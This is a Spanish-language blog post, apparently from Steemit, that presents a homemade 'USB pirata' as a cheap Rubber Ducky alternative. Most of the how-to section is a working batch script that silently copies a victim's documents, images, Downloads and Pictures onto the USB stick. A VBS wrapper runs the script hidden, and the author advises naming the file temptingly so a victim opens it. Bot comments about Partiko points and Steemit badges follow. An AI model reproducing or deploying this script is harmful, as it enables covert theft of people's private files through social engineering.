[Rubber Ducky vs Usb pirata]
Hola amigos como estan en esta ocasion ,es traigo un post de algo que les gusta a muchos y me incluyo,a mi por mi parte me encanta la seguridad y sus fallos, es por ello que hoy traigo lo que les traigo,una alternativa economica pero no tan eficiente a un Rubber Ducky, primero tenemos que saber que es u rubber ducky
¿Que es un Rubber Ducky?
Un rubber ducky es un dispositivo con apariencia a simple vista de un usb comun,que a diferencia de cualquier otro usb de almacenaiento, un ordenador o pc de mesa los detecta como si fueran un hardware; me explico para una pc hay dispositivos de entrada y de alida, y unidades de almacenamiento, los dispositivos de entrada y de salida son como por ejemplo, microfonos,teclados,mouse osea dispositivos que tienen cierto control sobre el equipo, y unidades de almacenamientos que lo son discoduros, memorias y cualquier otro donde podamos almacenar informacion.
es hay en dode entra el rubber ducky en los dispositivos de entrada y de salida, ya que este se integra en el sistema operativo (Windows,Linux,OS) y permite ejecutar payloads,Keylogers y otras cosas que se encargan de informar al ataacante (quien provee el Rubber Ducky), no necesitamos saber por ahora.
Todo con el simple echo de conectar el "usb" a nuestra pc.
Desventajas de los rubber Ducky
-Precio 45$
Alternativa
Una simple lternativa es hacer un usb pirata personalizada
Desventaja del usb pirata
-Necesita un poco de ingenieria social
-Tener algo de conocimiento de CMD de Widows (aunque da igual si no)
-Puede ser incluso igual de poderoso si lo juntas con otros programas como(Keylogers,gusanos)
Como hacer usb pirata
-Puedes tomar el atajo que te ofresco y copias el codigo que aqui te dejo y ver el video del final para entender el uso.
PASO1-
Ve al escritorio de windows y crea un archivo de texto, pulsado click derecho del mouse en la pestaña nuevo-> Documento de texto..una ves abierto el block de notas pega el siguiente codigo.
IF NOT EXIST ".\vYruz"%USERNAME% MD ".\vYruz"%USERNAME%
cd ".\cosas"%USERNAME%
robocopy *.txt "C:\Users%username%\Documents" ".\vYruz%username%"
robocopy *.txt "C:\Users%username%\Downloads" ".\vYruz%username%"
robocopy *.txt "C:\Users%username%\Pictures" ".\vYruz%username%"
robocopy *.txt "C:\Users%username%\Desktop" ".\vYruz%username%"
robocopy *.jpg "C:\Users%username%\Documents" ".\vYruz%username%"
robocopy *.jpg "C:\Users%username%\Downloads" ".\vYruz%username%"
robocopy *.jpg "C:\Users%username%\Pictures" ".\vYruz%username%"
robocopy *.jpg "C:\Users%username%\Desktop" ".\vYruz%username%"
robocopy *.png "C:\Users%username%\Documents" ".\vYruz%username%"
robocopy *.png "C:\Users%username%\Downloads" ".\vYruz%username%"
robocopy *.png "C:\Users%username%\Pictures" ".\vYruz%username%"
robocopy *.png "C:\Users%username%\Desktop" ".\vYruz%username%"
robocopy *.docx "C:\Users%username%\Documents" ".\vYruz%username%"
robocopy *.docx"C:\Users%username%\Downloads" ".\vYruz%username%"
robocopy *.docx"C:\Users%username%\Pictures" ".\vYruz%username%"
robocopy *.docx"C:\Users%username%\Desktop" ".\vYruz%username%"
robocopy *.doc "C:\Users%username%\Documents" ".\vYruz%username%"
robocopy *.doc "C:\Users%username%\Downloads" ".\vYruz%username%"
robocopy *.doc "C:\Users%username%\Pictures" ".\vYruz%username%"
robocopy *.doc "C:\Users%username%\Desktop" ".\vYruz%username%"
XCopy C:\Users%username%\Pictures .\vYruz%username% /s /y
XCopy C:\Users%username%\Downloads .\vYruz%username% /s /y
PASO 2
luego de que lo hayas copiado procedemos a guardar como. script.bat (en la parte de abajo que dice archivo de texto cambiar por ASCII )
Si se guarda bien todo nos quedara un segundo archivo con el nombre que pusimos, si no nos saldra un desfigurado asi
: script.bat.text para solucionar esto al guardar devemos cambiar el tipo guardado de-> .Todos los archivos de texto cambiarlo a todos los archivos .
Paso 3
Crear un segudo archivo de texto con el siguiente codigo
Dim WinScriptHost
Set WinScriptHost = CreateObject("WScript.Shell")
WinScriptHost.Run Chr(34) & "script.bat" & Chr(34), 0
Set WinScriptHost = Nothing
NOTA:(podemos cambiar lo que esta en parentesis por el nombre que le pusimos a nuestro anterior archivo "script.bat")
en el cual procederemos igual que en el paso anterior, guardaremos pero enves de colocar sript.bat le pondremos cualquiercosa.vbs, lo importante en todo esto es la extension .bat y .vbs los nombres no tanto
y listo. ese es nuestro codigo malevolo. podremos colocar un nombre tentador para nuestra victima par que lo abra y asi caer.
aqui te dejo el link para que descargues el codigo---->https://adsrt.me/IDq5L
y aqui el video por si no entendiste bien------>
Hello @vyvyrruz! This is a friendly reminder that you have 3000 Partiko Points unclaimed in your Partiko account!
Partiko is a fast and beautiful mobile app for Steem, and it’s the most popular Steem mobile app out there! Download Partiko using the link below and login using SteemConnect to claim your 3000 Partiko points! You can easily convert them into Steem token!
https://partiko.app/referral/partiko
Congratulations @vyvyrruz! You received a personal award!
You can view your badges on your Steem Board and compare to others on the Steem Ranking
Vote for @Steemitboard as a witness to get one more award and increased upvotes!